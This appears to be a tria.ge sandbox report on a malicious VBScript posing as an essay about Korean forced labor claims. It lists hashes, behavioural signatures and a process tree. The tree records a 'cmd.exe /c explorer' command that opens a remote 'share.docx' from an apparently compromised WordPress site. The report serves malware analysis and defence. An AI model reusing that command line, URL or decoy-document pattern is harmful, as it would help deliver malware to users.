Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Analysis
-
max time kernel
241s -
max time network
275s -
platform
windows11-21h2_x64 -
resource
win11-20240412-en -
resource tags
arch:x64arch:x86image:win11-20240412-enlocale:en-usos:windows11-21h2-x64system -
submitted
20/04/2024, 06:42
Static task
static1
Behavioral task
behavioral1
Sample
Essay on Resolution of Korean Forced Labor Claims.vbs
Resource
win7-20240221-en
Behavioral task
behavioral2
Sample
Essay on Resolution of Korean Forced Labor Claims.vbs
Resource
win10-20240404-en
Behavioral task
behavioral3
Sample
Essay on Resolution of Korean Forced Labor Claims.vbs
Resource
win10v2004-20240412-en
Behavioral task
behavioral4
Sample
Essay on Resolution of Korean Forced Labor Claims.vbs
Resource
win11-20240412-en
General
-
Target
Essay on Resolution of Korean Forced Labor Claims.vbs
-
Size
27KB
-
MD5
75ec9f68a5b62705c115db5119a78134
-
SHA1
6209f948992fd18d4fc6fc6f89d9815369ac8931
-
SHA256
ec9cc1940fe395867f5bab06016920f7194d753ae8cfa331bea0a44ecc8ef7cf
-
SHA512
82a0d96640390b8ffdcecd34fc1ae1663c84a299448a5af02b24bf9b9e1fdd19954ceeeea555808a57fcdc452b2b6e598338f11bb0c7101b34934a8ec7bf1780
-
SSDEEP
384:mrquVS33hr8nIsbSQVwooRmB7+shi14PdSkNk0dRL3K2fJ+QIHBR:mugSBrwIBQVwoI8dSMdBa2fGj
Malware Config
Signatures
-
Blocklisted process makes network request 3 IoCs
flow pid Process 9 1644 WScript.exe 10 1644 WScript.exe 13 1644 WScript.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Enumerates system info in registry 2 TTPs 3 IoCs
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName msedge.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS msedge.exe -
Suspicious behavior: EnumeratesProcesses 12 IoCs
pid Process 2092 msedge.exe 2092 msedge.exe 2836 msedge.exe 2836 msedge.exe 3608 msedge.exe 3608 msedge.exe 992 identity_helper.exe 992 identity_helper.exe 1656 msedge.exe 1656 msedge.exe 1656 msedge.exe 1656 msedge.exe -
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 6 IoCs
pid Process 2836 msedge.exe 2836 msedge.exe 2836 msedge.exe 2836 msedge.exe 2836 msedge.exe 2836 msedge.exe -
Suspicious use of FindShellTrayWindow 25 IoCs
pid Process 2836 msedge.exe 2836 msedge.exe 2836 msedge.exe 2836 msedge.exe 2836 msedge.exe 2836 msedge.exe 2836 msedge.exe 2836 msedge.exe 2836 msedge.exe 2836 msedge.exe 2836 msedge.exe 2836 msedge.exe 2836 msedge.exe 2836 msedge.exe 2836 msedge.exe 2836 msedge.exe 2836 msedge.exe 2836 msedge.exe 2836 msedge.exe 2836 msedge.exe 2836 msedge.exe 2836 msedge.exe 2836 msedge.exe 2836 msedge.exe 2836 msedge.exe -
Suspicious use of SendNotifyMessage 12 IoCs
pid Process 2836 msedge.exe 2836 msedge.exe 2836 msedge.exe 2836 msedge.exe 2836 msedge.exe 2836 msedge.exe 2836 msedge.exe 2836 msedge.exe 2836 msedge.exe 2836 msedge.exe 2836 msedge.exe 2836 msedge.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 1644 wrote to memory of 1956 1644 WScript.exe 78 PID 1644 wrote to memory of 1956 1644 WScript.exe 78 PID 1956 wrote to memory of 4544 1956 cmd.exe 80 PID 1956 wrote to memory of 4544 1956 cmd.exe 80 PID 3804 wrote to memory of 2836 3804 explorer.exe 82 PID 3804 wrote to memory of 2836 3804 explorer.exe 82 PID 2836 wrote to memory of 1372 2836 msedge.exe 85 PID 2836 wrote to memory of 1372 2836 msedge.exe 85 PID 2836 wrote to memory of 764 2836 msedge.exe 86 PID 2836 wrote to memory of 764 2836 msedge.exe 86 PID 2836 wrote to memory of 764 2836 msedge.exe 86 PID 2836 wrote to memory of 764 2836 msedge.exe 86 PID 2836 wrote to memory of 764 2836 msedge.exe 86 PID 2836 wrote to memory of 764 2836 msedge.exe 86 PID 2836 wrote to memory of 764 2836 msedge.exe 86 PID 2836 wrote to memory of 764 2836 msedge.exe 86 PID 2836 wrote to memory of 764 2836 msedge.exe 86 PID 2836 wrote to memory of 764 2836 msedge.exe 86 PID 2836 wrote to memory of 764 2836 msedge.exe 86 PID 2836 wrote to memory of 764 2836 msedge.exe 86 PID 2836 wrote to memory of 764 2836 msedge.exe 86 PID 2836 wrote to memory of 764 2836 msedge.exe 86 PID 2836 wrote to memory of 764 2836 msedge.exe 86 PID 2836 wrote to memory of 764 2836 msedge.exe 86 PID 2836 wrote to memory of 764 2836 msedge.exe 86 PID 2836 wrote to memory of 764 2836 msedge.exe 86 PID 2836 wrote to memory of 764 2836 msedge.exe 86 PID 2836 wrote to memory of 764 2836 msedge.exe 86 PID 2836 wrote to memory of 764 2836 msedge.exe 86 PID 2836 wrote to memory of 764 2836 msedge.exe 86 PID 2836 wrote to memory of 764 2836 msedge.exe 86 PID 2836 wrote to memory of 764 2836 msedge.exe 86 PID 2836 wrote to memory of 764 2836 msedge.exe 86 PID 2836 wrote to memory of 764 2836 msedge.exe 86 PID 2836 wrote to memory of 764 2836 msedge.exe 86 PID 2836 wrote to memory of 764 2836 msedge.exe 86 PID 2836 wrote to memory of 764 2836 msedge.exe 86 PID 2836 wrote to memory of 764 2836 msedge.exe 86 PID 2836 wrote to memory of 764 2836 msedge.exe 86 PID 2836 wrote to memory of 764 2836 msedge.exe 86 PID 2836 wrote to memory of 764 2836 msedge.exe 86 PID 2836 wrote to memory of 764 2836 msedge.exe 86 PID 2836 wrote to memory of 764 2836 msedge.exe 86 PID 2836 wrote to memory of 764 2836 msedge.exe 86 PID 2836 wrote to memory of 764 2836 msedge.exe 86 PID 2836 wrote to memory of 764 2836 msedge.exe 86 PID 2836 wrote to memory of 764 2836 msedge.exe 86 PID 2836 wrote to memory of 764 2836 msedge.exe 86 PID 2836 wrote to memory of 2092 2836 msedge.exe 87 PID 2836 wrote to memory of 2092 2836 msedge.exe 87 PID 2836 wrote to memory of 4864 2836 msedge.exe 88 PID 2836 wrote to memory of 4864 2836 msedge.exe 88 PID 2836 wrote to memory of 4864 2836 msedge.exe 88 PID 2836 wrote to memory of 4864 2836 msedge.exe 88 PID 2836 wrote to memory of 4864 2836 msedge.exe 88 PID 2836 wrote to memory of 4864 2836 msedge.exe 88 PID 2836 wrote to memory of 4864 2836 msedge.exe 88 PID 2836 wrote to memory of 4864 2836 msedge.exe 88 PID 2836 wrote to memory of 4864 2836 msedge.exe 88 PID 2836 wrote to memory of 4864 2836 msedge.exe 88 PID 2836 wrote to memory of 4864 2836 msedge.exe 88 PID 2836 wrote to memory of 4864 2836 msedge.exe 88 PID 2836 wrote to memory of 4864 2836 msedge.exe 88 PID 2836 wrote to memory of 4864 2836 msedge.exe 88
Processes
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Essay on Resolution of Korean Forced Labor Claims.vbs"1⤵
- Blocklisted process makes network request
- Suspicious use of WriteProcessMemory
PID:1644 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c explorer "https://makeoversalon.net.in/wp-content/plugins/wp-custom-taxonomy-image/iiri/share.docx"2⤵
- Suspicious use of WriteProcessMemory
PID:1956 -
C:\Windows\explorer.exeexplorer "https://makeoversalon.net.in/wp-content/plugins/wp-custom-taxonomy-image/iiri/share.docx"3⤵PID:4544
-
-
-
C:\Windows\explorer.exeC:\Windows\explorer.exe /factory,{75dff2b7-6936-4c06-a8bb-676a7b00b24b} -Embedding1⤵
- Suspicious use of WriteProcessMemory
PID:3804 -
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://makeoversalon.net.in/wp-content/plugins/wp-custom-taxonomy-image/iiri/share.docx2⤵
- Enumerates system info in registry
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:2836 -
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=90.0.4430.212 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=90.0.818.66 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ffd42be3cb8,0x7ffd42be3cc8,0x7ffd42be3cd83⤵PID:1372
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1856,14832185898251107777,5227339259610177367,131072 --gpu-preferences=SAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=1864 /prefetch:23⤵PID:764
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1856,14832185898251107777,5227339259610177367,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2376 /prefetch:33⤵
- Suspicious behavior: EnumeratesProcesses
PID:2092
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1856,14832185898251107777,5227339259610177367,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2620 /prefetch:83⤵PID:4864
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1856,14832185898251107777,5227339259610177367,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3268 /prefetch:13⤵PID:4172
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1856,14832185898251107777,5227339259610177367,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3288 /prefetch:13⤵PID:3740
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1856,14832185898251107777,5227339259610177367,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3940 /prefetch:13⤵PID:4348
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1856,14832185898251107777,5227339259610177367,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4068 /prefetch:13⤵PID:4268
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1856,14832185898251107777,5227339259610177367,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3936 /prefetch:83⤵
- Suspicious behavior: EnumeratesProcesses
PID:3608
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1856,14832185898251107777,5227339259610177367,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4072 /prefetch:13⤵PID:4596
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1856,14832185898251107777,5227339259610177367,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5252 /prefetch:13⤵PID:4736
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\90.0.818.66\identity_helper.exe"C:\Program Files (x86)\Microsoft\Edge\Application\90.0.818.66\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=1856,14832185898251107777,5227339259610177367,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5612 /prefetch:83⤵
- Suspicious behavior: EnumeratesProcesses
PID:992
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1856,14832185898251107777,5227339259610177367,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.22000.1 --gpu-preferences=SAAAAAAAAADoAAAwAAAAAAAAAAAAAAAAAABgAAAQAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=3852 /prefetch:23⤵
- Suspicious behavior: EnumeratesProcesses
PID:1656
-
-
-
C:\Windows\System32\CompPkgSrv.exeC:\Windows\System32\CompPkgSrv.exe -Embedding1⤵PID:2152
-
C:\Windows\System32\CompPkgSrv.exeC:\Windows\System32\CompPkgSrv.exe -Embedding1⤵PID:2424
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
152B
MD50fcda4fac8ec713700f95299a89bc126
SHA1576a818957f882dc0b892a29da15c4bb71b93455
SHA256f7a257742d3a6e6edd16ac8c4c4696d4bdf653041868329461444a0973e71430
SHA512ab350ca508c412ff860f82d25ac7492afb3baf4a2827249ebc7ec9632ee444f8f0716389f0623afc0756f395cf00d7a90a0f89b360acdf72b1befe34eecb5986
-
Filesize
152B
MD521986fa2280bae3957498a58adf62fc2
SHA1d01ad69975b7dc46eba6806783450f987fa2b48d
SHA256c91d76b0f27ccea28c4f5f872dee6a98f2d37424ef0b5f188af8c6757090cbb5
SHA512ae9ba1abe7def7f6924d486a58427f04a02af7dd82aa3a36c1ed527a23ec7897f00b0e30f22529e9599ae2db88e8abc7ba8013b426885aa3c961ee74678455f1
-
Filesize
498B
MD5d9a4069147eda85efebb239ac0ab0b43
SHA15f2e5e906d980417b06c1eefd126e35d8b12e754
SHA25608ae5ab00e602ebfb0fd533ea03eb337942df45fb05ab0e43d3dd7ecb665ba0c
SHA512a5370396ecbedcce98a3e84af7332ce08d53ff83c0e97ae36ae9f2a98e504104f67208ce006580c2fd29754552b39d74b707b7426b7c88a176979c014b4ed24a
-
Filesize
5KB
MD576b480b2e0e3b42b456223b7a799a34a
SHA1e9b776fe6f99f3c7bd7f08d0632bd44948ecd807
SHA256a1992889c9c3d96da3e186d50c6b38e89e35420230f0244bd08987b73dcdf99b
SHA512afe2c8f586de32b42c92fcfcccf40d21db7f617d6582de12cf6fc86214cce7a1312666958996d3202b15c50e0c6c6c8e1ae88048a8473e866dfbf5f65c6d4b91
-
Filesize
6KB
MD510da995855ecdb5edbd4f16a477330ac
SHA1378f7a7acaca3da56360719cbca6785f9c176b0c
SHA2568b4d1eccdf2d5bc04657d5d6a7aac590dde924073076946b6fa25168f0244028
SHA512a35078caac06185fdcc295eb6a2ce347ee14a53444a4e7363b6dd1cf9c1b71cf9c59b2dde4240ca74c860288042b969b99ece7ff02f4580d8306adee736dc6e1
-
Filesize
16B
MD56752a1d65b201c13b62ea44016eb221f
SHA158ecf154d01a62233ed7fb494ace3c3d4ffce08b
SHA2560861415cada612ea5834d56e2cf1055d3e63979b69eb71d32ae9ae394d8306cd
SHA5129cfd838d3fb570b44fc3461623ab2296123404c6c8f576b0de0aabd9a6020840d4c9125eb679ed384170dbcaac2fa30dc7fa9ee5b77d6df7c344a0aa030e0389
-
Filesize
11KB
MD5da7c30b2726c0316742a5836d5ce80b3
SHA11323123429abb0856675cce750b147e6c855c162
SHA25671f575319e2e6289a4950d2655dfdf1bc3894a4627a998d13e529698c0df524c
SHA5124965e873650d2d6fd16d21c34172144dd5dd69e4d145f3db38d7d56e9baeebe157f38980134cbd4006c0a1ca8f3c9a48817ea38bfe032fa0c2b883a6b31d4ee7